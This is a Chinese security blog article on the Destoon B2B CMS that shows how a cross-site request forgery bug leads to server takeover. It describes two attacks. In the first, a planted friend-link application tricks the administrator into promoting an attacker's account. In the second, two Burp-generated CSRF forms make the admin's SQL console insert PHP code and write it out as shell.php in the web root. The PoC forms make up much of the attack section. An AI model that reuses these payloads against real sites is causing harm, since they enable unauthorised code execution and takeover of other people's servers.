客服QQ:872490018 服务时间:9:00-21:00
i春秋学院
培育信息时代的安全感

当前位置:首页 > 安全 > 技术 > 正文

DESTOON从CSRF到GETSHELL
作者:
2017年09月25日 18:48:42
9618 次阅读
来源: 爱尖刀
Destoon B2B网站管理系统是一套完善的B2B(电子商务)行业门户解决方案。

本文作者:薄荷糖微微凉

系统基于PHP+MySQL开发,采用B/S架构,模板与程序分离,源码开放。模型化的开发思路,可扩展或删除任何功能;创新的缓存技术与数据库设计,可负载不低于百万级别数据容量及访问。系统被数万b2b网站所采用,同时,也有数量巨大的开发者利用该系统进行二次开发。

0x 01 受影响版本以及利用成功的条件

受影响版本官方最新版条件为后台开启SQL功能


*******************************************************************************************

0x 02第一种方式,利用CSRF提升用户权限然后执行管理员操作GETSHELL。

1,首先我们先在前台注册一个用户。这里随便注册,这里注册的用户我们可以提升权限。

2,然后我们构造一个提升我们的会员至管理员的数据包并放置在外部网站上,在友情链接申请处添加一个友链申请,将我们构造好数据包的链接放入,引导管理员查看。

3,在后台管理员进行审核时会查看该链接时我们的会员就变成了管理员。然后此时可以使用下面的方式进行getshell。

0x 03第二种方式,直接使用csrf漏洞来getshell。1,后台打开SQL管理功能时会有如下的操作界面。

2,构造插入shell代码的sql语句然后放置外部网站,通过申请链接功能来使管理员进行访问

3,当管理员查看该链接时,在数据库中便插入了我们的代码。

<html>  <!– CSRF PoC – generated by Burp Suite Professional –>  <body> 

<form action=”http://127.0.0.1/destoon/admin.php?” method=”POST”>

<input type=”hidden” name=”file” value=”database” />

<input type=”hidden” name=”action” value=”execute” />

<input type=”hidden” name=”sql” value=”INSERT&#32;INTO&#32;destoon&#95;keylink&#32;&#40;itemid&#44;title&#44;url&#44;item&#44;listorder&#41;VALUE&#32;&#40;&apos;1&apos;&#44;&apos;&lt;&#63;php&#32;phpinfo&#40;&#41;&#32;&#63;&gt;&apos;&#44;&apos;sdd&apos;&#44;&apos;ds&apos;&#44;1&#41;” />

<input type=”hidden” name=”submit” value=”�#137;§&#32;�#161;Œ” />

<input type=”submit” value=”Submit request” />   

</form>

</body>

</html>

4,构造我们生成shell页面的数据包,然后同样通过申请友链的方式进行诱使管理员操作。

<html>  <!– CSRF PoC – generated by Burp Suite Professional –>  <body> 
 <form action=”http://127.0.0.1/destoon/admin.php?” method=”POST”>      

<input type=”hidden” name=”file” value=”database” />

<input type=”hidden” name=”action” value=”execute” />

<input type=”hidden” name=”sql” value=”SELECT&#32;title&#32;FROM&#32;destoon&#95;keylink&#32;WHERE&#32;url&#61;&apos;sdd&apos;&#32;INTO&#32;OUTFILE&#32;&apos;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;www&#47;destoon&#47;shell&#46;php&apos;” />    

<input type=”hidden” name=”submit” value=”�#137;§&#32;�#161;Œ” />

<input type=”submit” value=”Submit request” />

</form>

</body>

</html>

5,当管理员访问该链接时,就在服务器端生成了shell脚本。


[广告]赞助链接:

舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/
四季很好,只要有你,文娱排行榜:http://www.yaopaiming.com/

  • 网络尖刀
    公众号:mcbang_com
    数据、技术、运营
  • 知安
    公众号:knowsafe
    黑客、技术、安全
  • 查舆情
    公众号:chayuqing_com
    舆情、文娱、品牌

Copyright © 2013 IjianDao.Com,All Rights Reserved

网络尖刀 版权所有 京ICP备14006288号-3